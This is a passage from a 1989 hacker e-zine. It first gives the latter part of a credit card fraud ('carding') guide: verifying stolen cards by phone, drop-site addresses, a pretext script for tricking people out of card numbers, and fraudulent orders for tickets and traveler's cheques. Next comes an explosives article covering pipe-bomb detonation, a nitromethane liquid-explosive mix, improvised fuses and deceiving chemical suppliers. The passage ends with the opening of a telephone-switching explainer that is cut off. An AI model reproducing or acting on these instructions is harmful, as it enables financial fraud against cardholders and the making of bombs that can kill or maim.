to call, a merchant number, and perhaps a bank number. Jot these down and head



on home. The format for these is usually different, but all have the basic idea



in mind. Call an operator of some sort, tell her the authorization information



that she asks for (bank number,merchant number, etc)  and give her the card and



the amount for which to verify the card. She will check and let you know if it



has enough credit left. Simple. BUT***







 ******************* ONE NOTE **********************



 When you check a card for a certain amount of money, that amount of money is



subtracted from the amount available on the card. For example, if a card has



$5,000 left on it, and you get ahold of it and check it for $2,000, you can



only spend $3,000 before it tells you that you don't have the necessary credit



to go through with a transaction.







VII. Purchasing Merchandise: The Real Story







     OKAY, now that you have a VALID credit card, you will most likely want to



get some newly acquired merchandise. This is all fine and dandy, but if you



don't know what you are doing, you can get yourself and most likely your



friends in a LOT of trouble.











---------------------------------------------------------------------------



*** WARNING : NEVER ORDER SOMETHING FROM YOUR HOUSE. ALWAYS GO OUT TO A ***



*** PAY PHONE. ALSO, ALWAYS HAVE A STORY WORKED OUT BEFORE YOU CALL.    ***



*** THAT IS, YOUR NAME, ADDRESS, JOB, PHONE NUMBER, EXCUSE FOR NOT BEING***



*** HOME, MOTHER'S MAIDEN NAME, ETC. ANY STUTTERING OR HESITATION COULD ***



*** BLOW THE WHOLE SHOW !!!  !!!  !!!  !!!  !!!  !!!  !!!  !!!  !!!  !!!***



---------------------------------------------------------------------------











  FIRST- Let me clarify something. When you order something over the phone, and



the person selling you the items wants to know the actual Cardholder's name,



address, phone number, etc, you DO NOT have to give him/her the correct



information. [UNLESS: You do have to give the person correct information if



they have an online connection to a credit record bureau such as CBI or TRW. In



this case, as they can verify everything that you say in a matter of moments,



just do your best, get a new card, and never order from this company again. I



will not lie to you: some companies do have this capability. But if you stick



with little bussinesses who need your money, you'll do fine. ] Bullshit your



way through. Or hire a social engineer to do it for you. You do not even have



to give the correct expiration date! Almost Any expiration date will work as



long as it is at least one month ahead of the current month and it is not TOO



far ahead in time so that it jumped over the actual expiration date. (ie, if



the current date is 10/89, give the expiration date 11/89 -- simple) The



company from which you are buying things can not verify the extra information



YOU give them until after the order has been processed and the package shipped.



They have to get in touch with a Credit Union, which will be discussed later on



in this summary, to verify it all. * ALL THAT THEY CAN VERIFY PRONTO IS THAT



THE CREDIT CARD IS VALID, AND THAT IT HAS ENOUGH CREDIT TO PAY FOR THE



MERCHANDISE YOU ARE PURCHASING. * My suggestion, however, is that you give them



the phone number of a pay phone near your house. [ Or, if you want to REALLY



make sure things go smoothly, give them the number of a direct dial VMB local



to the shipping address. ] If they want to call you back, FINE. Ask them to do



so between the hours of X pm and Y pm. And, just pitch tent at the phone for a



few hours a night. No problem. They will almost always call right back, since



they don't want to inconvenience their customer who happens to be buying $6,000



worth of computers at the time. Understand?







  SECOND- Where should I ask have them ship it to, you ask? Fret not, my little



friend in carding. Before you call and order your things, first go out and find



an abandoned house. These still work best. Either one that has been moved out



of, and no one has moved into yet. Or, if you can, find one that is REALLY



abandoned. (BUT MAKE SURE IT HAS A STREET ADDRESS THAT THE POSTMAN OR UPS MAN



CAN FIND!) Jot down this address. This is referred to as a drop site.



[ Ed. Note: if, and I say IF you can rent a mailbox, do so. Make sure they sign



for everything (UPS, etc) and bring some FAKE ID with you to open it up. Most



of the time, they will give you hastle, and verify EVERYTHING you give them. So



it is really not that easy to get one of these. At least try, though. ] OKAY,



give this address to the man or lady who is taking your order. Tell them this



is where you live. REMEMBER, they can not verify that you don't live there for



quite a while. They will send everything there. When the shipment comes (either



Overnight, Second Day, or whenever), pick it up (CASUALLY) and stroll home to



open your package. If it does not come, or if the salesperson gives you



trouble, don't worry. If it didn't come, it is because 1) It got intercepted by



the feds or 2) The company didn't process it because they did actually try to



verify your address, name, and phone number, thus delaying your shipment, but



saving themselves a lot of money. Just try another store until you find some



place that is easy to buy from.







  THIRD- I suggest that you do not furnish your household with carded items. It



is just not wise. Get a few things, if you like, and wait a little while. Sit



tight. When things cool down, you might want to get some more things. REMEMBER-



all things are good in proportion, but when you get out of that proportion (ie,



get greedy and order a new house) you will most definately get caught sometime



or another. Patience is the carder's best friend. (along, of course, with the



VISA formula... hehe)







  FOURTH- You have all heard it before. DON'T DISPLAY YOUR SPEICAL TALENT AT



SCHOOL, PARTIES, OR SOCIAL EVENTS. Not even to your best friends. ESPECIALLY



not to your best friends. They are the ones most likely to brag about you and



spread the word. This is the farthest thing from what you want. Keep it to



yourself, and if you must tell someone about it, either call Phone Sex, a



Bridge, or an Alaskan Operator. Those are your only choices, as no other carder



or phreak wants to hear about how good you actually are.







  FIFTH- I wouldn't advise making a bussiness out of this, either. Sure, if you



want to get a few dollars for things you order (and that you don't want



anymore) sell it and keep the money. But its purely asinine to take "orders"



from people for money. And even if you don't want money. Keep in mind that



Credit Fraud IS a felony, and getting caught violating US Federal Laws is not a



fun experience to go through. Do you want to go to jail for 10 years, and never



again be able to get a good job because Joey down the street wanted to pay $10



for a new skateboard that retails for $75?? Thats what I thought. Your whole



goal in life, as long as you participate in the Underground Arts, is to keep a



low profile.







VIII. Getting Credit Cards







     There are a number of ways through which you can get credit cards.







  FIRST- Go trashing. That is, go in back of a bank, department store (make



sure it is not in a mall!), or other store which accepts credit cards. When the



coast is clear, jump in their trash bin. Rummage around a bit. Having a look



out might prove to be wise. What you are looking for are carbons - the carbon



paper which the salesperson throws out after a purchase has been made. Remember



these? It is the device that guarentees you (a legit customer) get a receipt of



your credit card purchase, and also that the store gets a copy for record



keeping. Once you find these, (and making sure you don't rip them) put them in



a bag, pocket, whatever, and get somewhere safe. (home?) Hold them up to the



light, and copy down everything you think is important. Card Number, expiration



date, name, address, bank name, etc... Then BURN the carbons. This destroys all



evidence that you ever had them. From here, you are set. Order away!







   SECOND- If you have a friend that works in a store which performs credit



card transactions, you might save yourself the trouble of banana peals on your



head and ask him/her if they might not mind slipping the carbons into a bag



after they ring up a sale. (or have them copy everything down for you.)







  THIRD- You might try bullshitting people and getting their cards. You have to



be VERY good, and the person has to be VERY stupid for this to work. In my



mind, it is a waste of time, and almost never works. (Because people where I



live are smart, of course..) I am presenting this to you in case you live in a



society of morons. Exploit every area that you possibly can. The conversation



might go something like this:







YOU: "Hello, Mrs. Davis? This is Mr. Off from Security down at Citibank. We



have had a computer breakdown and no more of your VISA transactions can be



processed since we lost your credit card number. Do you think that you can give



me your number again, so I can re-enter it right now?"







Mrs. Davis: "Wait a minute, who is this again?"







YOU: "My name is Jack Off and I am from Citibank Security. (Explain whole



situation to her again )"







Mrs. Davis: "I don't know about this. Can I call you back at a number?"







YOU: "Sure. That's no problem. I understand your reluctance. Here... call me at



my office. Its 555-1212 (pay phone, loop, or bridge which you are at)"







Mrs. Davis: "Ok, bye!"







<CLICK>



<RING...>



YOU: "Hello? This is Jack Off's office, Citibank Security, may I help you?"







Mrs. Davis: "Oh, good. I was afraid you were a phony. Ok, my VISA is xxxx-



xxx-xxx-xxx... "







YOU: "Thank you. We will try to restore your credit limit as soon as possible.



Until then, please refrain from trying to purchase merchandise on your Citibank



Visa Card. Goodbye."







<CLICK>







Neat, huh?







  FOURTH- If are a really advanced Carder, you can get fancy and use a credit



card formula. Great, you're saying to yourself. GIMME GIMME GIMME! Not so



quick. Although several do exist, and I do have a couple of them, I am in a



situation in which I am unable to reveal it. If you are particularly smart and



intelligent, you can develope it yourself. Actually, it is not that hard if you



have the means. MAYBE if you are good at math....







  FIFTH- You may try to get credit cards from other people. (friends?) I



stronly recommend against this. Usually the cards you get from other people



have usually already been used and are either being watched or are already



dead.







  SIXTH- If you have access to a Credit Union, you can call and "pull" someone



else's account. (For instance, if you know someone's name and address, or



social security, you can take a look at all of their loans and credit cards. )















IX. Advanced "Carding" Techniques







     Please, people, I beg of you -- If you have not been carding for a year or



two (AT LEAST) do not read this information. It will only confuse you, and even



if you understand it, it will not work as it should unless you have the



experience you are lacking. So sit tight and practice with parts I-VIII.



PLEASE!







     If, perchance, you happen to have the experience necessary to read on,



then enjoy this. The following are simply a few details, hints, etc, that I



just left out of the original manuscript due to my horrendous memory. Add to it



if you like, and pass it a long. We all need to help each other if we are going



to survive. Also, the following are in no particular order except that which



they come to my head.







1) For a drop site, you can try to get fancy if need be. I have heard of empty



military huts being used as well as empty condos, empty houses whose owners are



on vacation, and about a zillion other stories. If you think you have come



across something new, think a plan up, think it over, and think it over again.



Make sure you have every step down so when you order, pick up, and make your



escape, there are no problems. Think about it . . . what harm does it do to



spend an hour making sure you didn't overlook something. It is a lot better



than going there and getting caught.







2) Sometimes the places you order from will have an online account with a



credit record bereau. (Such as TRW, CBI or Transunion) The horrifying fact is



that they can verify ONLINE ANY information that you give them. So, you're



busted, right? Wrong . . .



If this happens, there is nothing you can do unless you have a lot of power



with phones. Chances are, you don't. So play it cool and give an excuse to get



off the phone. Just try somewhere else. Also, if you don't do this right, you



will probably kill the credit card.











X. Credit Unions







     Credit Unions basically are databases that hold information of its



members. When you apply for a credit card, I think that the application to be a



member of a Credit Union is presented also. Since almost EVERY person who owns



a credit card has personal information in at least one of these services, then



there is no fooling he who has access to these services. Many times in your



carding career, you will run into a bussiness who has an online connection to



such unions. If you try to present false information they will catch you and



follow up with the appropriate actions. (That is, report the credit card you



said is yours as dead, call the authorities, etc, etc.)



     Two of the major Credit Bureaus in the United States are TRW and CBI. As



these two services hold large bases of information on its members (ie, every



credit card holder in America), many unauthorized personnel often wish to gain



access to them. They are accessed through a computer by calling a Bureau port



and entering authorization passwords.



     For CBI, the passwords are in the format of nnnllnnn-**, where n=a number



0-9; where l=a letter from a-z; and where *=any character.



     For TRW, the passwords are in the form of lllnnnnnnnlnl. (using the same



key as CBI.)



     As you can see from the length and complexity of these passwords, it is



literally impossible to hack them. (ie, hack in the sense guess them.) So you



are probably wondering how unauthorized persons gain access, huh? Well, we



either have inside information or we go trashing. Thats it.



     Right now, however, I am not going to go any further into the subject of



credit unions. Be aware that they exist, and they can help you as well as hurt



you if you don't know what you are doing. At a later date I plan on devoting an



entire file to the subject of credit unions, as I haven't seen an up-to-date



file in years.















Thats about all. I wish you all good luck, and may your adventures be safe and



fun-filled. And if I EVER catch any of you giving out the credit formula (once



you discover it..) I am going to personally fly over and kick your ass.



(remember- I have carded tickets around the country many times. There is



nothing to stop me from visiting YOUR town.. hahaha)







One final note -- VISA is planning on changing their credit formula within a



few years. So if you happen to be reading this many a year down the line, you



will most likely discover that some of this is no longer valid. DONT BLAME ME.



It was valid at the time when I compiled it.























APPENDIX A



----------











Credit Card Formats



-------------------







American Express -- xxxx xxxxxx xxxxx



                     X/    X/    X/



                     /     |      X



                    /      |       X



            4 digits   6 digits     5 digits







VISA -- xxxx xxxx xxxx xxxx



        X_________________/



        4 digits each group







               OR







     -- xxxx xxx xxx xxx



         X/  X_________/



         /    3 digits each



 4 digits











Mastercard -- xxxx xxxx xxxx xxxx



              X_________________/



              4 digits each group











Discover -- xxxx xxxx xxxx xxxx



             X_________________/



             4 digits each group.



















APPENDIX B



----------







Credit Verifiers











1800-554-2265. Use '#' (pound) as control key.







     Card Type:    10 = Mastercard



                   20 = Visa







     Bank Identification:   1067







     Merchant Number(s): 1411



                         52







IDEA:: You all know those sex lines (like 800-666-LUST), well they verify your



credit card before they let you listen. You might try calling one of these and



using it for a while if you have nothing else.























APPENDIX C



----------











Other Things to Do







1] Plane Tickets







     It is relatively easy to order plane tickets using a credit card nowadays.



And, for convenience, you can order over the phone. Well, look up your favorite



airline, call them, and present them with the situation. You would like 2



executive class tickets to Florida [ Ed. Note - If you live in Florida, make it



a trip to California ] round trip to be billed to your Visa Credit Card. Oh



sure, maam. My credit card number is <blank>. My expiration date is <blank>. My



Name is Joe Schmoe. I live at 223 Hard On Lane, Pubic Hair, PA. Oh, and maam,



could you PLEEAZE hold the tickets at the airport for me. I will present some



identification to pick them up there. Thank you.



     It is relatively easy to do this. But, there are a few catches.







          A.) Do NOT stay for any long period of time at any one place. After



              few days, the airline will catch on to what you have done. My



              suggestion is that you stay for only about 2 to 3 days. Or, if



              you really want to stay for a long time, get a one way ticket to



              wherever it is that you would like to go to. Stay however long



              you want to stay and take another 1 way ticket home.







          B.) If you plan on traveling around the country, catch one way



              tickets around from place to place. And please, USE DIFFERENT



              AIRLINES!







2] Motorcycles







     Again, you would be surprised at the amount of work (or lack of it)



required to aquire motorcycles on other people's credit cards. I believe you



can all see the advantages, so let us get down to the procedure. First, set up



an order under a corporate account. You can find these sometimes if you work in



a store that would use such cards. (Look over shoulders) Well, I will leave to



you the methods to come upon corporate account cards. Once you have them,



finish the procedure. Step 2 is to send an "employee" (yourself or a stupid



friend) to pick it up. Bring proper identification that was issued from the



corporation. (I suggest making your own -- Not very hard). Offer a Voice Mail



Box as your bussiness number. It is very common for a high level employee to be



absent from his desk. Use your imagination for the rest, and tidy it up to



perfect it.







3] Travelers Cheques







     OKAY, I will admit this is getting out of hand, but what the hell -- For



those of you very daring and in possession of a very good form of false



identification (Birth Certificate?), you can easily order some American Express



Traveler's Cheques for your travels around the world. The number to call is



1-800-777-7337. Using your American Express Credit Card, order some of these



"babies" in another name. (For a gift..) Have them delivered as you deem



appropriate. Enjoy them thouroughly.



[ Ed. Note: This number is active as of 12-20-88. I don't know if these offer



this service year round. Find out! ]











=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







                    P/HUN Issue #4, Volume 2: Phile 5 of 11



                    DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD







             Introduction to Home Explosive Manufacture







                             Written by:



                             Franz Liszt







               I do not assume any responsibility in



         how this information is used; legally or illegally



             and I do not recommend that one manufacture



                explosives without a B.A.T.F. licence.



           Do not worry about possessing this information



             because the F.O.I.A. allows you to have any



          information such as this, so as long as it is not



                          classified data.







     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-











                            INTRODUCTION







I know of all of you phreaks, hackers, etc. out there are interested



in any kind of information that the public usually does not publicize.



This is why I have wrote this phile - to inform you. I also feel that



I should volunteer this information to PHUN because I have obtained



much useful information from that publication and others. I think that



anyone with good knowledge should teach it to their phriends because



we are becoming a dumb race due to the enlightened attitude of the



population from influences such as yuppies, geeks, skateboard freaks,



subliminal brainwashing, bloated bureaucrats, and lazy legislatures.



We must try to become free THINKING people so our brains do not atrophy.



Don't let any of the above influences brainwash you into a quivering



pathetic mass of gelatin like so many people are now. Use any



information from philes you read to benefit you and rid of the



bastards out to get you!!!







At any rate, lets get on with it...The field of explosives is a very



interesting one to study. It can be fun, and it can be dangerous at



the same time. One must exercise great caution when assembling any



type of explosive device since most are sensitive to jarring, rough



handling, friction, static, and other influences. THIS INCLUDES



MIXING ANY CHEMICALS OR EXPLOSIVES TOGETHER.







            DO NOT EVER MIX ANY EXPLOSIVE FORMULA TOGETHER WITH



           ANOTHER UNLESS YOU WANT YOUR BODY EVAPORATED OR AT THE



                   LEAST, LIMBS REMOVED OR EYES BLINDED.







If you are uncertain of an explosive formula you have found in an



anarchist book or on some BBS, don't make it. As a matter of fact,



don't trust to many philes you see and only believe the reputable



books such as "The Poor Man's James Bond I & II", the "CIA Black



Books", and army field manuals. I also ran across some new books



called "Kitchen Improvised Explosives", which can be had from a



radical book company called LOOMPANICS UNLIMITED P.O. Box 1197, Port



Townsend, WA 98368. They are also a very good source for information



but the procedures outlined require more lab apparatus.







It is also a good idea to take some chemistry classes. Take advantage



of chemistry in high school if you are still there. You can learn a lot



if you pay attention and read ahead of your teacher. Try to get on his



good side so he will let you perform "extracurricular activities" in



the school lab. You can learn a lot by doing experiments and you can



also have access to chemicals and expensive lab ware which I find is



necessary to safely make many explosive compounds. If you are out of



school, and you want to get serious about explosives, take a chemistry



class or two at your local college. Call your local Technical school



if you have one and ask them if they are offering any miners blasting



seminars in the future (yes these do exist). If not, call your local



bureau of mines and inquire. Some "social engineering" may be



necessary when talking to them though.







One should at least go to the local library and look for explosive



books and check the encyclopedias for "scratch the surface"



information. If you know a little about chemistry, get the book "The



Chemistry of Powder and Explosives" by Tenny L. Davis. You can obtain



journal footnotes from such books and do further research in "Chemical



Abstracts" and "The Journal of the American Chemical Society" along



with many others; all obtainable from a halfway decent college



library in the reference section.



             __________________________________________







                           EXPLOSIVE TYPES







Basically, there are two types - low and high. The low explosives are



chemical compounds such as black powder, flash powder, match head



powder, etc. These compounds do not necessarily explode but have more



of a burning characteristic. They will propagate into an explosion



when confined in a solid container such as a "pipe-bomb" so the gases



they produce can expand forcefully instead of burning away in the open



air. Black powder for instance detonates at about 300 meters per



second, which roughly means if you make a "train" or line of it 300



meters long, and detonate it with a blasting cap at one end of the



train, the chain reaction and decomposition of the whole train will



take one second. And black powder releases about 12000 PSI when confined



in nominal 2" water pipe with a wall thickness of 1/8" and detonated



with a No. 8 blasting cap (this is a standard size blasting cap that



coal miners and the military uses). Notice I said that it must be



detonated. You cannot just stick a wick in the pipe and light it because



more that likely it will only burn and make a big fire. I will talk more



about detonation later. 2,4,6-Trinitrotoluene (TNT) detonates at about



7400 meters per second when cast loaded into a container. TNT is a high



explosive and its subsequential confinement in a container is not as



important as with low explosives. High explosives are chemical compounds



that will explode regardless of containment. You could lay a big pile



of TNT on the ground, lay a blasting cap on top of it, light the wick,



and the whole mess will still explode. High explosives undergo a



chemical reaction of decomposition in less that a millionth of a second.



All of the energy is released instantaneously. Low explosives, such as



black powder have more of a burning characteristic. High explosives not



only detonate much quicker, but also release more energy. TNT releases



about 4.24 million PSI and the military explosive C-4 releases about 5.7



million PSI and detonates at 8100 meters per second!



            _____________________________________________







                              DETONATION







Most high explosives are not capable of detonating without being set off



or initiated with another explosion. This is done with the help of those



neat little goodies called blasting caps. They contain medium to high



explosives also, but their chemical composition(s) are unstable and will



detonate when fire or spark is introduced to them. You may ask then why



not just use blasting cap explosive instead of regular high explosives.



Well, blasting cap materials are VERY sensitive to shock, friction, etc.



and are also not as efficient as regular high explosives.







Anyway, the blasting cap is usually placed in the high explosive in a



well dug in the high explosive. An example would be like this in a pipe



bomb:







                                     _______ Blasting cap



                                    /



                               !-- * --!



                               !   *   !



                               !   *   !



                               !       !_____ Pipe bomb



                               !       !



                               !       !



                               !       !



                               !       !



                               !-------!











                     (please excuse the ASCII drawing)











When the cap is detonated, the explosive wave it generates is directed



downward and detonates the high explosive in a "chain reaction".



This is why the bottom of the explosive container should be placed on



the target. The peak of the propagated explosive wave will be at the



bottom of the explosive charge...







At any rate, I do not suggest that one attempts to manufacture blasting



caps without knowledge in explosive handling safety and also the proper



laboratory procedures when making the blasting cap explosive itself.







I have made over 300 blasting caps without an accident. I also take very



careful precautions before assembling the caps and I have a properly



equipped laboratory to synthesize the explosive material. I always work



in a controlled environment with accurate measuring equipment for any



explosive experiment I partake in. It is necessary to work under a lab



fume hood to vent any toxic gases produced during experiments. It is also



a good idea to ground yourself and your work area so static electricity



doesn't wreak havoc and blow your chemical up in your face.







IT IS GOSPEL TO FOLLOW DIRECTIONS WHEN DOING ANY EXPERIMENT. ESPECIALLY



WITH EXPLOSIVES. Outline your explosive production procedure before



proceeding with any experiment.







Refer to literature at your local library concerning blasting cap mfg.



before you attempt to make them. The book I mentioned "The Chemistry of



Powder and Explosives" covers the subject very well. There are also some



good books available from Paladin Press on explosive manufacture and the



blasting cap manufacture.







It is possible to create blasting caps in a "kitchen" type environment,



but I do not recommend it because of the dangers involved when making



the explosive components. Many of the starting materials are corrosive



and toxic. Blasting cap explosives are also VERY sensitive. More so than



nitroglycerine in some cases. For instance, Lead azide, the most popular



blasting cap explosive today, when synthesized improperly, can grow into



crystals in the starting agent solution and spontaneously explode just



because of improper stirring and/or cooling. Very easy mistake to do.



Mercury fulminate, one of the cheapest and easiest to synthesize,



produces toxic gases when synthesizing. When the finished product is dry,



it is sensitive to a 2cm drop of a 5 lb. weight. THAT IS SENSITIVE!







ALTERNATIVE:







After all of this negative talk of blasting caps leaves much to be



desired. But there is an alternative to using blasting caps if one has



access to firecrackers such as M-80's, M-100's, M-200's, cherry bombs,



Maroons, etc. These little bombs themselves are sufficient enough to



detonate many high explosives. All of the "nitro" compounds will



detonate with one of these firecrackers. Their use would be the same



as the blasting cap - inserted in a little "well" made in the explosive



charge, sealing off, and their fuse ignited accordingly.







            ____________________________________________







                        MAIN EXPLOSIVE CHARGE







This is the big working explosive. The one that does the big damage.



It should be handled with the same precautions as blasting caps, but



in many cases, can be as safe as handling fertilizer.







Some examples of common high explosives are ditching dynamite, gelatin



dynamite, ANFO (ammonium nitrate fertilizer/fuel oil), TNT, PETN, RDX,



military plastics, and even smokeless powder.







These explosives are easily made in some cases, and dangerous at the



same time. Since it is beyond the scope of this article, I must refer



everybody to your local library, the books I have mentioned, or most of



the "unusual" book publishers. Just do research in all possible material



before grabbing a book and running out, buying the chemicals, and



throwing stuff together. Get yourself a few of the "black-books", the



"Poor Man's James Bond volumes", etc. and compare them with each other.



Don't trust any unheard of publishers or books.







It goes the same for the main charge; if one doesn't have access to the



necessary chemicals, one can improvise. For instance the smokeless



powders available from gunsmith's and reloading shops contain high-



explosives such as nitrocellulose and nitroglycerine. They are called



double based propellants. An example is made by Hercules Powder co.



called "Bullseye" pistol propellant. It contains:







 48% Nitroglycerine



 50% Nitrocellulose



  2% Flash suppressants, stabilizers, etc.







It will detonate at about 7200 meters/sec. when firmly packed in 2 inch



wide, schedule 40 hardened steel pipe. It detonates with 2,000,000 PSI



also. This should suffice for many operations.







I myself placed 1 1/2 pounds of the powder in a three pound coffee can



and detonated it with an M-80 firecracker and it left a ditch in hard



packed clay-soil about 2 feet deep and 3 feet wide! It was simply placed



on the ground with the bottom of the can down. The blast was plainly



heard indoors 1 mile away! Please if you attempt such a blast, make sure



you give yourself ample time to get at least 300 yards away and don't



detonate it near any buildings within 50-75 yards because the air-blast



will possibly crack their windows. I usually use a lit cigarette placed



on the fuse of the cap or firecracker. This will give you about 10 min.



delay depending on the temperature and wind conditions. Packing the



cigarette will give a longer delay.







Another good explosive, if you prefer a liquid explosive is a mixture of



Nitromethane and amine based compounds such as aniline, ethylenediamine,



and for anyone that can't obtain the above chemicals, regular household



ammonia will work as long as it is the clear non-detergent brand.



The Nitromethane can be had from any "speed-shop" or race car parts



supplier. It usually runs about $20 to $30 bucks a gallon. Simply mix the



two liquids: 96% nitromethane and 4% ammonia (by weight). This explosive



has the disadvantage of being somewhat insensitive. You need at least



a No. 8 blasting cap to detonate it. It only need be confined in any kind



of capped bottle and the blasting cap inserted in the neck. The blasting



cap should be dipped in wax before immersion in the liquid explosive.



Some Nitromethane manufactures add a indicator dye that turns purple when



the liquid becomes dangerously explosive. So, when you mix your ammonia



with the Nitromethane and the solution turns purple, you know that you



have done well!



            ________________________________________







                 OBTAINING CHEMICALS AND LAB WARE







Getting your chemicals and lab ware can present a problem in some cases.



In order to order laboratory chemicals, one must be a company, or



try to prove that you are a company. Most suppliers don't like to sell



to individuals in fear of clandestine drug and explosive manufacture.



Those same companies also can be fooled easily with homemade letterhead



also. For those of you with laser printers, the sky is the limit. If



you don't have a laser printer, you should visit your local print shop.



First, simply call the chemical companies and request for a catalog.



You must get on the phone and say something on the order of:



"Hello...this is C.B.G. Water Treatment Corp., may I speak to sales



please? I would like to order your most recent catalog..."



When you get catalogs from different companies, compare their prices



and shipping charges. Make sure you don't order a set of chemicals



where it is obvious you are making something you don't want them to know



you are making. A suspicious order would be Nitric & Sulfuric acid and



glycerine. This would be obvious that you are going to produce nitro-



glycerine. Spread out your orders and orders between companies. Also



be careful of watched chemicals. The drug enforcement agency watches



certain orders for certain chemicals. They usually say something on the



order of under the listing of the chemical entry in the catalog "only



sold to established institutions." It just so happens that certain



explosive synthesis requires the chemicals as some illicit drug



production.







Go to your local library in the reference section. Get the THOMAS REGISTER



It is a set of books that list addresses of industrial suppliers. Look



under chemicals for addresses.







I do know of one company called Emerald City Chemical in Washington.



They only require that you be at least 18 years of age. No letterhead



necessary.







I suggest staying away from Fisher Scientific, Seargent Welch, Sigma &



Aldrich Chemical companies because they are either expensive, only sell



to schools, or watch for illegal or suspicious chemical orders. I noticed



that a lot of you phreaks out there live in New York; so stay away from



City Chemical Co. I was informed that they closely watch their customers



also.







Don't make some letterhead for Jo Blow's Sewing Machine Repair and order



complicated chemicals like 2,3,7,8-tetrachlorodibenzo-p-dioxin, bis-2-



ethylhexy-diadipate, 3,4-diaminofurazain, or pharmecitucal type chemicals



or any kind of chemical that looks like a foreign language. It looks



VERY suspicious and your address will be forwarded to your local FBI or



DEA office pronto. Nowadays you really got to watch what you order



thanks to our bleeding heart liberals worrying about kids blowing their



hands off trying to make firecrackers, or folks making controlled drugs in



their basements.



            ________________________________________







                            CONCLUSION







I hope this information is of some use to you. Just remember that it is



a federal offense to manufacture and transport explosives or explosive



devices without a B.A.T.F. licence.







Also keep in mind that if you do decide to make yourself some bombs,



just remember NOT TO TELL ANYONE! If you tell someone, that is just the



added risk of getting caught because your "buddie" was a stool pigeon.



BELIEVE ME - chances are if you tell someone, others will find out from



gossip and you will be the alias "mad bomber" of your town. If someone



happens to see any lab equipment or if your neighbors smell any strange



chemical smells around your home, they might even think you are making



drugs, so be careful. If you tell your friends of your activities, don't



be surprised if you see a gunmetal grey Dodge Diplomat with a dozen



antennas protruding from it sitting across the street with a guy in it



watching your house with a spotting scope...







DO NOT SELL explosives to ANYONE without a licence. If they get caught,



the feds will plea-bargan with them and find out where they got the



bombs and of course your buddie will tell them so he gets a reduced



sentence. They WILL get a search warrant with no problem and proceed



to ransack your premises. I know of a person that was in a similar



situation. He didn't have any explosives in his house, but they seized



his chemicals because of the complaint filed. Subsequently, the feds



kept up pretty good surveillance on him for quite a while.







Use this information with caution and don't blow yourself up!







            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-







Feb. 20, 1989







Brought to you by



Franz Liszt,



and The Manipulators...







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







NOTICE: THIS FILE MAY ALSO BE RELEASED IN A 'YET TO COME' NEWSLETTER.



*************************************************************************



* *               P/HUN Issue #4, Volume 2: Phile 6 of 11             * *



* *               DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD             * *



* *                                                                   * *



* *            Traffic Service Position System(TSPS) No. 1B           * *



* *                                                                   * *



* *                  Call Processing and Explanation                  * *



* *                              Part One                             * *



* *                                                                   * *



* ********************************************************************* *



* ********************************************************************* *



* *                                                                   * *



* *                     - Coin Stations and ACTS                      * *



* *                     - Calling Card Service                        * *



* *                                and                                * *



* *                     - Billed Number Screening                     * *



* *                     - Busy Line Verification                      * *



* *                                                                   * *



* ********************************************************************* *



* ********************************************************************* *



* *                                                                   * *



* *                  Written By. . . Phelix the Hack                  * *



* *                                                                   * *



* ********************************************************************* *



* ********************************************************************* *



* *                                                                   * *



* *  The author hereby grants permission to reproduce, redistribute   * *



* *  or include this file in your g-file section, electronic or print * *



* *  newsletter, or any other form of transmission of your choice,    * *



* *  pending the fact that it is kept intact and in its entirety,     * *



* *  with no additions, alterations or deletions of any of the info   * *



* *  included below.                                                  * *



* *                                                                   * *



* *  Phelix the Hack                              Feb. 1989           * *



* *                                                                   * *



* ********************************************************************* *



*************************************************************************











1.0 Introduction



================







The purpose of this file is discuss and describe the general system



architecture and processing of certain calls handled in a Traffic Service



Position System (TSPS) No. 1B office.  From here after, any reference to the



anacronym - TSPS, will be used to describe the Traffic Service Position System



1B.  Wheras TSPS processes a wide variety of call types (listed below), this



file will deal primarily with only a few types which I feel to be of special



interest and importance to the phreak/hack community.  Future files on TSPS



will continue to expand upon the information presented here, and will discuss



additional call types and processing.







The types of calls, elected to be discussed in this file will fall primarily



within the three following categories:







        1)  Coin Station Calls (Payphone) and ACTS call processing.



        2)  Calling Card Service and Billed Number Screening.



        3)  Busy Line Verification















2.0  Table of Contents



======================







        Section Description



        ======= ===========



          3     Anacronyms and Abbreviations used throughout this file.



          4     General overview of call types.



          5     General call processing for Coin and CC Services.



          6     Coin Station.



          7     Calling Card Service.



          8     Busy Line Verification



          9     Conclusion : Acknowledgements and References.



















3.0  Anacronyms and Abbreviations



=================================







The following is a list of anacronyms and abbreviations commonly used



throughout this file.  Due to the large number of times each appears, from



this point on the abbreviations will be used the majority of the time.







        - TSPS          - Traffic Service Position System



        - ANI           - Automatic Number Identification



        - ANIF          - ANI Failure



        - ONI           - Operator Number Identification



        - H/M           - Hotel/Motel



        - DLS           - Dial Line Service



        - ACTS          - Automated Coin Toll Service



        - CCS           - Calling Card Service



        - BNS           - Billed Number Screening



        - OST           - Originating Station Treatment



        - SOST          - Special Operator Service Treatment



        - OPCR          - Operator Actions Program



        - RQS           - Rate Quote System



        - PTS           - Position and Trunk Scanner



        - RTA           - Remote Trunk Arrangement



        - DDD           - Direct Distance Dialed



        - AMA           - Automatic Message Accounting



        - CAMA          - Centralized Message Accounting



        - RBOC          - Regional Bell Operating Company



        - MF            - Multi-Frequency



        - DTMF          - Dual Tone Multi-Frequency



        - CDA           - Coin Detection and Announcement



        - SSAS          - Station Signaling and Announcement Subsystem



        - SPC           - Stored Program Control



        - T&C           - Time and Charge



        - PIN           - Personal Identification Number



        - RAO           - Revenue Accounting Office



        - NPA           - Numbering Plan Area



        - CCIS          - Common Channel Interoffice Signaling



        - APF           - All PINs Fail



        - OTC           - Operating Telephone Company



        - ICVT          - InComing Verification Trunk



        - OGVT          - OutGoing Verification Trunk



        - INTT          - Incoming No Test Trunks



















4.0 General Overview of Call Types



==================================







All call processing can be broadly thought of as the processing of a service



request (by an operator or a customer) thru connection, talking state, and



disconnection.  Call types can be classified into the following two major



groups: (Although no definite line can be drawn, in that the groups often



overlap each other.)







4.1  Customer Originated Calls



==============================







The first category of calls are those which can be classified as customer

